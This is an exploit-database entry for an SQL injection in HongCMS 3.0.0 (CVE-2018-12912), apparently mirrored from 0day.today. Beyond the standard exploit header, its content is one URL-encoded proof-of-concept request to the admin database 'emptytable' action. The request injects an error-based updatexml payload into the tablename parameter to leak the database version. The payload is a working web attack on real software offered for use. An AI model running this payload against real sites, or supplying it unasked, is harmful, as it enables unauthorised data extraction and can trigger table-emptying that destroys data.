id: 30646
date: 06/28/2018
title: HongCMS 3.0.0 - SQL Injection Vulnerability
author: hzllaga
cves: CVE-2018-12912

# Exploit Title: HongCMS 3.0.0 - SQL Injection
# Google Dork: [if applicable]
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/Neeke/HongCMS/
# Software Link: https://github.com/Neeke/HongCMS/
# Version: 3.0.0
# Tested on: php5.4 mysql5
# CVE : CVE-2018-12912
 
POC (Administrator Privilege):
 
/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60

#  0day.today [2023-03-25]  #